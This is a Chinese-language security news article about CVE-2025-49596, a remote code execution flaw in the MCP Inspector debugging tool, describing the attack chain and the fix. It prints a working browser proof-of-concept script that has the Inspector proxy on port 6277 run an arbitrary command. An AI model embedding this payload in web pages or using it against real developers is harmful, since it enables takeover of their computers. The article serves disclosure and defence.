MCP Inspector 高危远程代码执行漏洞威胁AI开发者(CVE-2025-49596)

漏洞概述

2025年6月,Oligo安全研究团队披露了Anthropic公司Model Context Protocol(MCP,模型上下文协议)框架核心调试工具MCP Inspector中存在的高危远程代码执行(Remote Code Execution,RCE)漏洞CVE-2025-49596。该漏洞CVSS评分为9.4分,攻击者仅需通过浏览器标签页即可完全控制开发者的计算机。

MCP Inspector漏洞示意图


图片来源:Oligo安全研究团队

技术背景

Model Context Protocol(MCP)是一个开源框架,旨在连接各类工具和智能体,相当于AI系统间智能协作的"粘合剂"。该框架获得微软、OpenAI和谷歌等科技巨头的支持,其服务器广泛部署于本地开发环境和云平台,通常采用Python或JavaScript编写。

MCP Inspector是Anthropic开发的调试工具,主要包含:

  • 基于React的交互式客户端
  • 基于Node.js的代理服务(用于连接UI与后端服务器)

漏洞详情

该工具默认运行时存在严重配置缺陷:

  • 未启用身份验证机制
  • 未部署加密传输保护
  • 缺乏访问控制措施

攻击链工作原理:

  1. 开发者使用标准mcp dev命令启动MCP Inspector
  2. 代理服务器监听0.0.0.0:6277端口(实质等同于localhost,但可被局域网其他设备访问)
  3. 恶意网站植入JavaScript载荷向MCP Inspector发送请求
  4. 该请求可在主机上执行任意命令,包括安装后门、访问文件或建立反向shell

该漏洞利用浏览器存在19年的"0.0.0.0-day"缺陷,使网站能与本地主机服务通信。研究团队特别警告:"最严重的风险在于公共网站发起的跨站请求伪造(CSRF)攻击...即使用户仅监听localhost仍会导致远程代码执行。"

实际危害

攻击示例:当开发者浏览含有恶意脚本的教程网页时,隐藏的JavaScript会向http://0.0.0.0:6277/sse?command=...发送请求,瞬间控制其计算机。典型攻击载荷如下:

<script>
fetch("http://0.0.0.0:6277/sse?transportType=stdio&command=touch&args=%2Ftmp%2Fexploited-from-the-browser", {
  "headers": {
    "accept": "*/*",
    "accept-language": "en-US,en;q=0.9", 
    "cache-control": "no-cache",
    "pragma": "no-cache"
  },
  "referrer": "http://127.0.0.1:6274/",
  "referrerPolicy": "strict-origin-when-cross-origin",
  "body": null,
  "method": "GET",
  "mode": "no-cors",
  "credentials": "omit"
})
</script>

研究团队还发现多个可通过独特HTTP头指纹识别的公开暴露实例,这些系统无需浏览器交互即可直接遭受远程命令执行攻击。

修复措施

Anthropic安全团队在0.14.1版本中实施了以下改进:

  • 采用类似Jupyter notebook的会话令牌认证机制
  • 增加Origin头检查防御CSRF攻击
  • 更新文档强调仅限本地使用规范

研究人员确认:"会话令牌确保只有授权客户端能使用检查器,有效缓解CSRF攻击风险。"

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值